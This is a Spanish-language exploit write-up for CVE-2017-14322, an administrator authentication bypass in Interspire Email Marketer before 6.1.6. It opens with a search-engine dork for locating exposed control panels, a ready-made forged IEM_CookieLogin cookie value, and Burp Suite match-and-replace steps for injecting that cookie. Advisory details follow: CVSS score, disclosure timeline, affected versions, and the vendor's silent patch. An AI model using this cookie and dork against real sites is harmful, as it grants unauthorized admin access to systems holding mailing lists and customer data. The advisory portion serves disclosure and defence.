
CVE-2017-14322 Exploit de Interspire Email Marketer (emailmarketer)
intitle:"Control Panel" + emailmarketer
Añade un Match y Replace para el encabezado de solicitud como se muestra a continuación:
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
Cuando abras el sitio, no funcionará la primera vez porque el encabezado Cookie no está presente. Actualiza el sitio una segunda vez usando el proxy de Burp con la regla anterior añadida, verás lo que querías. Asegúrate de marcar "Intercept Client Requests"
Interspire Email Marketer - Bypass de autenticación de administrador remoto
Hakan Küsne, Infoteam Security (CH)
CVE-2017-14322
Puntuación base CVSS: 9.8 Vector CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O
2017-09-12 Vulnerabilidad descubierta 2017-09-12 Se descubrió que el proveedor ya lo había corregido, pero nunca lo comunicó a los clientes, dejando a cientos vulnerables en el mundo real 2017-10-17 Divulgación pública
Interspire Email Marketer anterior a la versión 6.1.6
http://www.interspire.com/emailmarketer/
La función encargada de comprobar si el usuario ya ha iniciado sesión en init.php de Interspire Email Marketer (IEM) anterior a 6.1.6 permite a los atacantes remotos omitir la autenticación y obtener acceso administrativo mediante el uso de la cookie IEM_CookieLogin con un valor especialmente manipulado. Además, si el cliente no tiene un plan de mantenimiento anual, la aplicación dice que está en la última versión disponible y que no hay actualización.
Las vulnerabilidades se encontraron durante una respuesta a incidentes en una instancia comprometida de la aplicación.
Detalles proporcionados aquí : https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
El proveedor ha parcheado la vulnerabilidad en la versión 6.1.6, pero nunca se lo comunicó específicamente a sus clientes.
Este exploit es solo con fines educativos y no se hace responsable de tus propias acciones.